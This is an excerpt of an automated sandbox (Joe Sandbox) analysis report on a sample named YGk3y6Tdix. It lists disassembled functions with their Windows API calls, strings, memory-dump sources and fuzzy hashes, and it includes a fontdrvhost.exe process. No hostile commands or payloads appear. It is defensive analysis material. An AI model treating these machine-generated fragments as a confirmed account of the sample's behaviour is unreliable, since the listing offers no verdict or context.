Opcode Fuzzy Hash: b7f91e8c564bfa304e8e3fb5d4ff7aac1a0143a8d7ce3df475c0a5e75a2bea23
Instruction Fuzzy Hash: 1A11E132900218BADB239A669D49FFF7B6CEF0A710F040020FA45B6084C7E99905ABA1

Function 00FBDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00FBDD1C, 00FBDD50
RENAMEDLG, xrefs: 00FBDD31

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 450d1226d5be585f94bf580b0e9f95f25a81e2b8f9ea1dca8a591f2e54fda12c
Instruction ID: 970c4b2feea63bd119a98b06e4f042bddd741a0573f5bd81d0d95ebd2265d25e
Opcode Fuzzy Hash: 450d1226d5be585f94bf580b0e9f95f25a81e2b8f9ea1dca8a591f2e54fda12c
Instruction Fuzzy Hash: DF01B536904289AFD711DF56FC84A967FA9F74C394B000025F545C7271D6319850FFA2

Function 00FC9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00FC9AA9
__alldvrm.LIBCMT ref: 00FC9CAA
__alldvrm.LIBCMT ref: 00FC9CCC

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction ID: b439bc26ca2eb9467b68c998dd6a4c00512cfa093e0074fb9f3c4d3e39e57552
Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction Fuzzy Hash: 38A14872D086879FE711CF18CA87FAEBBE5EF51320F1841ADE4859B281C6B89D41E750

Function 00FAA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00FA7F69,?,?,?), ref: 00FAA3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00FA7F69,?), ref: 00FAA43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00FA7F69,?,?,?,?,?,?,?), ref: 00FAA4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00FA7F69,?,?,?,?,?,?,?,?,?,?), ref: 00FAA4C6

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 428753878615020b0f42bed28365924965559dcad585830ceeecce6f55af9b70
Instruction ID: 7bddef75586c693d53ac47fb9eab1a371f8efb07ce0d33005eb2e0c164eaa427
Opcode Fuzzy Hash: 428753878615020b0f42bed28365924965559dcad585830ceeecce6f55af9b70
Instruction Fuzzy Hash: 2041F0B16483819AD731DF24DC49FEEBBE4AB86310F04091DB5D1D3190D7A99A0CEB53

Function 00FA1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FA112B
_wcslen.LIBCMT ref: 00FA1153
_wcslen.LIBCMT ref: 00FA1182
_wcslen.LIBCMT ref: 00FA11A9

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 2ea439877ad57e334ba2508df2d4ffe39c3d77211f8e43860cd1a770156e4265
Instruction ID: ca58dc171c602b40248380d2549bf1065cbf756beaa2285245f02eb4afcf3667
Opcode Fuzzy Hash: 2ea439877ad57e334ba2508df2d4ffe39c3d77211f8e43860cd1a770156e4265
Instruction Fuzzy Hash: E941B4B190066A5BCB22DF688D56AEF7BB8EF01310F014019F945F7245DE34AE598BA4

Function 00FCC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00FC91E0,?,00000000,?,00000001,?,?,00000001,00FC91E0,?), ref: 00FCC9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FCCA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00FC6CBE,?), ref: 00FCCA70
__freea.LIBCMT ref: 00FCCA79

Part of subcall function 00FC8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FCCA2C,00000000,?,00FC6CBE,?,00000008,?,00FC91E0,?,?,?), ref: 00FC8E38

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 8669f18c1f8e2523b9688e999b35ec39f9eff07ac86a217ff3d482ee541c25d3
Instruction ID: 573df37a4e3ca08c27b73fc8b8bc02da904dfd3102d235c000978eaff5bf5fdf
Opcode Fuzzy Hash: 8669f18c1f8e2523b9688e999b35ec39f9eff07ac86a217ff3d482ee541c25d3
Instruction Fuzzy Hash: 0431AE72A0020BABDB25DF75CD56EAE7BA5EB41320B04422DFC08E6250E739DD50EBD0

Function 00FBA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00FBA666
GetDeviceCaps.GDI32(00000000,00000058), ref: 00FBA675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FBA683
ReleaseDC.USER32(00000000,00000000), ref: 00FBA691

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 8396f778fcf9f20d4451a708c309c6f8c37dce3323a91bd0aea9c4647bceabb9
Instruction ID: 114d9fa95a23733bd7af48015c803fa8ed83a4caade0c38164675639b087ea62
Opcode Fuzzy Hash: 8396f778fcf9f20d4451a708c309c6f8c37dce3323a91bd0aea9c4647bceabb9
Instruction Fuzzy Hash: EBE0EC71943721AFD273AB61AC5DB8B3E54FB05B92F014111FB499E1C4DB6984018BA1

Function 00FBA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00FBA699: GetDC.USER32(00000000), ref: 00FBA69D
Part of subcall function 00FBA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FBA6A8
Part of subcall function 00FBA699: ReleaseDC.USER32(00000000,00000000), ref: 00FBA6B3

GetObjectW.GDI32(?,00000018,?), ref: 00FBA83C

Part of subcall function 00FBAAC9: GetDC.USER32(00000000), ref: 00FBAAD2
Part of subcall function 00FBAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00FBAB01
Part of subcall function 00FBAAC9: ReleaseDC.USER32(00000000,?), ref: 00FBAB99

Strings

(, xrefs: 00FBA9AA

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: f9c568c9041e199b1f67aba5d0349f1dd6b04ec7379ff1e10b347f8041c1ccb2
Instruction ID: 49d67d718581c22d8c95c95a55fe60cc1766036842918e29441b15e7555bd71f
Opcode Fuzzy Hash: f9c568c9041e199b1f67aba5d0349f1dd6b04ec7379ff1e10b347f8041c1ccb2
Instruction Fuzzy Hash: EF910FB1608344AFD621DF26C844A6BBBE9FFC9701F00491EF59AD7260DB31A905DF62

Function 00FA75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FA75E3

Part of subcall function 00FB05DA: _wcslen.LIBCMT ref: 00FB05E0

Part of subcall function 00FAA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FAA598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FA777F

Part of subcall function 00FAA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FAA325,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA501
Part of subcall function 00FAA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FAA325,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA532

Strings

:, xrefs: 00FA7654

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 568986d4666049e9f5f66bee106d690e07edaca7931266eb5d19e9cef89340fd
Instruction ID: f0997d6cc8a0c2521c2bb4d784868b232aa4d24bb7fb41bd52ba1adcb2d8be75
Opcode Fuzzy Hash: 568986d4666049e9f5f66bee106d690e07edaca7931266eb5d19e9cef89340fd
Instruction Fuzzy Hash: 9C4173B1804258A9EB25EB64CC56EDEB77DAF46300F0440A6B605A2192DB785F84EF71

Function 00FBB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FBB4E3
_wcslen.LIBCMT ref: 00FBB4FE

Strings

}, xrefs: 00FBB4D6

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: aeff5c3fc732620db668ae9fb48521509b74a7583067b7e1ba6d7fb209db8c79
Instruction ID: 5539574648e5279724f20c5445f485aa5fcc87b2f5f73557b80d71aa29e51243
Opcode Fuzzy Hash: aeff5c3fc732620db668ae9fb48521509b74a7583067b7e1ba6d7fb209db8c79
Instruction Fuzzy Hash: 6221D4729043065AD731EA65DD45FAAB3ECDF91760F08042AF540C3145E7A9DD48ABA3

Function 00FAF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00FAF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00FAF2E4
Part of subcall function 00FAF2C5: GetProcAddress.KERNEL32(00FE81C8,CryptUnprotectMemory), ref: 00FAF2F4

GetCurrentProcessId.KERNEL32(?,?,?,00FAF33E), ref: 00FAF3D2

Strings

CryptUnprotectMemory failed, xrefs: 00FAF3CA
CryptProtectMemory failed, xrefs: 00FAF389

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 6e9417272c21694b4fc7bd97f1b37becfb5cacf99e30d3e80fdcc71167b56e16
Instruction ID: 7b7b241522c7def3449e2970c3dc51ea4f22e9bff2c0e77f9304e7977400f32e
Opcode Fuzzy Hash: 6e9417272c21694b4fc7bd97f1b37becfb5cacf99e30d3e80fdcc71167b56e16
Instruction Fuzzy Hash: 911156B1A01328ABDF11AF71DC41A2E3755FF02771B04812AFC069F291CA389D06B792

Function 00FAB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00FAB9B8

Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5

Strings

%c:\, xrefs: 00FAB9AE

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 238688c580de31445dfd0f1874c22d9e105b8c7cfd977571d84c0ecda1c8aff5
Instruction ID: 5c53df4bca7e532e3ccb481fcad567a81daae48a8002ca317883f55358ddcfa5
Opcode Fuzzy Hash: 238688c580de31445dfd0f1874c22d9e105b8c7cfd977571d84c0ecda1c8aff5
Instruction Fuzzy Hash: CD01F9A350431279A6306B359C46E6BB7ACDE97770B40841EF544D6083EB38D444E3B2

Function 00FB101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00FB1160,?,00000000,00000000), ref: 00FB1043
SetThreadPriority.KERNEL32(?,00000000), ref: 00FB108A

Part of subcall function 00FA6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA6C54

Strings

CreateThread failed, xrefs: 00FB104F

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: b7fb1d92d3742f9feb91b3adef4b1a5999622cc25e19239a7f2c438e6c43663c
Instruction ID: b867facdc5eef448e930144813d6d24626730ef79f8a8010cbc2199e3578b123
Opcode Fuzzy Hash: b7fb1d92d3742f9feb91b3adef4b1a5999622cc25e19239a7f2c438e6c43663c
Instruction Fuzzy Hash: 2C01DBB53443496BD330AF7ADC51FB6B369FB407A1F10002EF64696181CAB1A8857625

Function 00FA1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00FAE2E8: _swprintf.LIBCMT ref: 00FAE30E
Part of subcall function 00FAE2E8: _strlen.LIBCMT ref: 00FAE32F
Part of subcall function 00FAE2E8: SetDlgItemTextW.USER32(?,00FDE274,?), ref: 00FAE38F
Part of subcall function 00FAE2E8: GetWindowRect.USER32(?,?), ref: 00FAE3C9
Part of subcall function 00FAE2E8: GetClientRect.USER32(?,?), ref: 00FAE3D5

GetDlgItem.USER32(00000000,00003021), ref: 00FA135A
SetWindowTextW.USER32(00000000,00FD35F4), ref: 00FA1370

Strings

0, xrefs: 00FA1319

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 82c09ed6b8bc69afd7e3f4b8b2f2b34b22008b0acc3d08bf92f3299af2a149ec
Instruction ID: 2405260cbf881a7ed81b7b0901f711b31f469ed40fb330e2c247b864e0dd0ed5
Opcode Fuzzy Hash: 82c09ed6b8bc69afd7e3f4b8b2f2b34b22008b0acc3d08bf92f3299af2a149ec
Instruction Fuzzy Hash: A7F0C2B090538CAADF160F61CC0DBEA3FA9BF46354F098214FD8454591CB7AD990FB10

Function 00FB0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00FB1206,?), ref: 00FB0FEA
GetLastError.KERNEL32(?), ref: 00FB0FF6

Part of subcall function 00FA6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA6C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00FB0FFF

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: b0c322056abaea7466d0d21bf434165116b7f7d0b2ea71f5d6414f6a5b64dc4f
Instruction ID: 9e96fca69569fd4e8836f2c77f5d6bdec2a67926445710bd073a671e3f8d09f3
Opcode Fuzzy Hash: b0c322056abaea7466d0d21bf434165116b7f7d0b2ea71f5d6414f6a5b64dc4f
Instruction Fuzzy Hash: A1D02B7150412437C61033355C09C6E79059B12332B540705F238A12F6CA2549817693

Function 00FAE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00FADA55,?), ref: 00FAE2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00FADA55,?), ref: 00FAE2B1

Strings

RTL, xrefs: 00FAE2AB

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 549035cd02192b6256c6de30ab7e2962b4981cf0ed20d5956373d62b4e1f3073
Instruction ID: e6db227f2ea3bd0a8e956278a450f2e05d1769ee77e6b561e9ed7729f9e1dfa7
Opcode Fuzzy Hash: 549035cd02192b6256c6de30ab7e2962b4981cf0ed20d5956373d62b4e1f3073
Instruction Fuzzy Hash: B3C0123164171066E63027746C0DB437B595B01B15F09045AB341E92D1D6A5C540A6A2

Analysis Process: fontdrvhost.exePID: 5012, Parent PID: 416COMMON

Executed Functions

Function 00007FFD9B880D48 Relevance: 1.5, Strings: 1, Instructions: 252COMMON

Download Yara Rule

Strings

5[_H, xrefs: 00007FFD9B880DF3

Memory Dump Source

Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd

Similarity

API ID:
String ID: 5[_H
API String ID: 0-3279724263
Opcode ID: f573f62a4c13b21d55ef58f5fbd65f6ec717bb957a6c02d05d040b5ed1917820
Instruction ID: 1a211a60ac3436a3058511a9c60a5ccc14e03849cfa031550408bebf242bd18c
Opcode Fuzzy Hash: f573f62a4c13b21d55ef58f5fbd65f6ec717bb957a6c02d05d040b5ed1917820
Instruction Fuzzy Hash: DC91E5B5A29A8D8FE759DB6888757A97BE1FF9A300F4001BED019D72E6DBB81411C700

Function 00007FFD9BC7946A Relevance: .7, Instructions: 736COMMON

Download Yara Rule

Memory Dump Source

